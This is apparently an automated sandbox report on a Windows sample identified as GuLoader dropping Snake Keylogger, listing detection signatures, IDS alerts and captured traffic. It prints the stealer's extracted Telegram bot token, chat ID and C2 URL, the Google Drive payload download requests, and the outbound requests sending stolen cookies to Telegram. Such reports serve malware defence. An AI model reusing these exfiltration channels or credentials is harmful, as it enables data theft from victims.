Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nonmerchantable.exe

Overview

General Information

Sample name:Nonmerchantable.exe
Analysis ID:1617041
MD5:0e90c7c0d54420a58998a5e6dfb0ecf1
SHA1:6b2889f49aa83bd04db89e3b4dc78455670c1272
SHA256:3193967e6f4f4475cb744fece3bd2e7cdc6b3dce1694d0371e2865305ee3c97b
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Nonmerchantable.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\Nonmerchantable.exe" MD5: 0E90C7C0D54420A58998A5E6DFB0ECF1)
    • Nonmerchantable.exe (PID: 3236 cmdline: "C:\Users\user\Desktop\Nonmerchantable.exe" MD5: 0E90C7C0D54420A58998A5E6DFB0ECF1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY", "Chat_id": "6838630391", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000003.3964116665.0000000038882000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000000.00000002.3640382417.00000000051B1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T13:28:18.704262+010028033053Unknown Traffic192.168.2.450007104.21.32.1443TCP
            2025-02-17T13:28:21.314531+010028033053Unknown Traffic192.168.2.450011104.21.32.1443TCP
            2025-02-17T13:28:23.921130+010028033053Unknown Traffic192.168.2.450015104.21.32.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T13:28:16.923276+010028032742Potentially Bad Traffic192.168.2.450005132.226.247.7380TCP
            2025-02-17T13:28:18.126424+010028032742Potentially Bad Traffic192.168.2.450005132.226.247.7380TCP
            2025-02-17T13:28:19.454517+010028032742Potentially Bad Traffic192.168.2.450008132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T13:28:11.606380+010028032702Potentially Bad Traffic192.168.2.450003142.250.184.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T13:28:36.970041+010018100081Potentially Bad Traffic192.168.2.450023149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T13:28:29.318329+010018100071Potentially Bad Traffic192.168.2.450022149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY", "Chat_id": "6838630391", "Version": "4.4"}
            Source: Nonmerchantable.exe.3236.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendMessage"}
            Source: Nonmerchantable.exeReversingLabs: Detection: 62%
            Source: Nonmerchantable.exeVirustotal: Detection: 65%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_394487A8 CryptUnprotectData,5_2_394487A8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_39448EF1 CryptUnprotectData,5_2_39448EF1
            Source: Nonmerchantable.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50006 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:50003 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:50004 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
            Source: Nonmerchantable.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Nonmerchantable.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0040646B FindFirstFileA,FindClose,5_2_0040646B
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_004027A1 FindFirstFileA,5_2_004027A1
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,5_2_004058BF
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 0585F45Dh5_2_0585F4AC
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 0585F45Dh5_2_0585F2C0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 0585FC19h5_2_0585F97A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39252D41h5_2_39252A90
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39253308h5_2_39252EF0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925FBD9h5_2_3925F930
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925D069h5_2_3925CDC0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925EED1h5_2_3925EC28
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39250040
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39250853
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925F329h5_2_3925F080
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925F781h5_2_3925F4D8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925E1C9h5_2_3925DF20
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925E621h5_2_3925E378
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925EA79h5_2_3925E7D0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39253308h5_2_39253236
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925D4C1h5_2_3925D218
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925D919h5_2_3925D670
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39250673
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39253308h5_2_39252EEA
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3925DD71h5_2_3925DAC8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39440B99h5_2_394408F0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39447EB5h5_2_39447B78
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39449280h5_2_39448FB0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944E816h5_2_3944E548
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39440FF1h5_2_39440D48
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944C826h5_2_3944C558
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944ECA6h5_2_3944E9D8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944CCB6h5_2_3944C9E8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394418A1h5_2_394415F8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39441449h5_2_394411A0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394402E9h5_2_39440040
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39443709h5_2_39443460
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394432B1h5_2_39443008
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944DEF6h5_2_3944DC28
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394462D9h5_2_39446030
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944BF06h5_2_3944BC38
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944C396h5_2_3944C0C8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then mov esp, ebp5_2_3944B081
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39446733h5_2_39446488
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39440741h5_2_39440498
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944E386h5_2_3944E0B8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39442A01h5_2_39442758
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394425A9h5_2_39442300
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944D5D6h5_2_3944D308
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944B5E6h5_2_3944B318
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394479C9h5_2_39447720
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394455D1h5_2_39445328
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39445E81h5_2_39445BD8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39445A29h5_2_39445780
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944FA56h5_2_3944F788
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944DA66h5_2_3944D798
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944BA76h5_2_3944B7A8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39442E59h5_2_39442BB0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39441CF9h5_2_39441A50
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944F136h5_2_3944EE68
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39447119h5_2_39446E70
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944D146h5_2_3944CE78
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39444D21h5_2_39444A78
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39446CC1h5_2_39446A18
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394448C9h5_2_39444620
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39447571h5_2_394472C8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39445179h5_2_39444ED0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 3944F5C6h5_2_3944F2F8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 39442151h5_2_39441EA8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B6970h5_2_394B6678
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B8AE8h5_2_394B87F0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B5E16h5_2_394B5B48
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B9940h5_2_394B9648
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B030Eh5_2_394B0040
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B6E38h5_2_394B6B40
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B3E26h5_2_394B3B58
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BEF50h5_2_394BEC58
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BC448h5_2_394BC150
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BAC60h5_2_394BA968
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B0C2Eh5_2_394B0960
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B8158h5_2_394B7E60
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B4746h5_2_394B4478
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BD768h5_2_394BD470
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B4BD7h5_2_394B4908
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B7300h5_2_394B7008
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BE0F8h5_2_394BDE00
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B2BE6h5_2_394B2918
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BC910h5_2_394BC618
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B19DEh5_2_394B1710
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B9E08h5_2_394B9B10
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B54F6h5_2_394B5228
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B8620h5_2_394B8328
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BF418h5_2_394BF120
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B3506h5_2_394B3238
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BDC30h5_2_394BD938
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BB128h5_2_394BAE30
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B3996h5_2_394B36C8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BE5C0h5_2_394BE2C8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BBAB8h5_2_394BB7C0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B6347h5_2_394B5FD8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BA2D0h5_2_394B9FD8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B079Eh5_2_394B04D0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B77C8h5_2_394B74D0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B42B6h5_2_394B3FE8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BF8E0h5_2_394BF5E8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BCDD8h5_2_394BCAE0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B22C6h5_2_394B1FF8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BB5F0h5_2_394BB2F8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B10BEh5_2_394B0DF0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B2756h5_2_394B2488
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BBF80h5_2_394BBC88
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B154Eh5_2_394B1280
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B9478h5_2_394B9180
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B5066h5_2_394B4D98
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B7C90h5_2_394B7998
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BEA88h5_2_394BE790
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B3076h5_2_394B2DA8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BD2A0h5_2_394BCFA8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B1E47h5_2_394B1BA0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BA798h5_2_394BA4A0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B5986h5_2_394B56B8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394B8FB0h5_2_394B8CB8
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394BFDA8h5_2_394BFAB0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F1FE8h5_2_394F1CF0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F1658h5_2_394F1360
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F0801h5_2_394F0508
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F0CC8h5_2_394F09D0
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F0338h5_2_394F0040
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F1B20h5_2_394F1828
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then jmp 394F1190h5_2_394F0E98
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_39514118
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_39510C78
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_39510C6A
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_39510F8E
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_39514108
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_39514480

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50023 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2017/02/2025%20/%2019:23:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendDocument?chat_id=6838630391&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4ff311ff9f78Host: api.telegram.orgContent-Length: 7046
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50008 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50005 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50003 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50007 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50015 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50011 -> 104.21.32.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
